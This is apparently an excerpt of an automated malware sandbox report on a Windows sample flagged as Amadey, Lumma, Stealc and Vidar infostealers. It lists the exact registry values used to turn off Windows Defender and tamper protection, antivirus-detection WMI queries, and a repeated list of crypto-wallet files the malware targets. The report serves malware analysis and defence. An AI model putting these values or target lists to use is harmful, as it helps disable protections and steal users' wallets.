Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

0_2_6C6535A0

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 167c7bdf2f.exe, 00000018.00000003.2825126679.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3012742968.000000000136E000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3012450017.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3012516391.0000000001357000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 20.2.skotes.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.DocumentsJDAKJDAAFB.exe.7e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.skotes.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.skotes.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2446509016.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2445335933.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3289889853.0000000000B91000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2416146514.00000000007E1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 2888, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 29.2.167c7bdf2f.exe.5a57979.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.3081849711.00000000085A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3007450920.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3134859442.0000000006081000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3254080654.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2411289868.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2894025783.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2786060868.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.3212643969.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2967174557.00000000058A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2036396995.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2853526780.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2827858049.0000000000FD1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 8408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 9056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 1888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2411289868.00000000007D4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2411289868.0000000000824000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2411289868.0000000000805000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
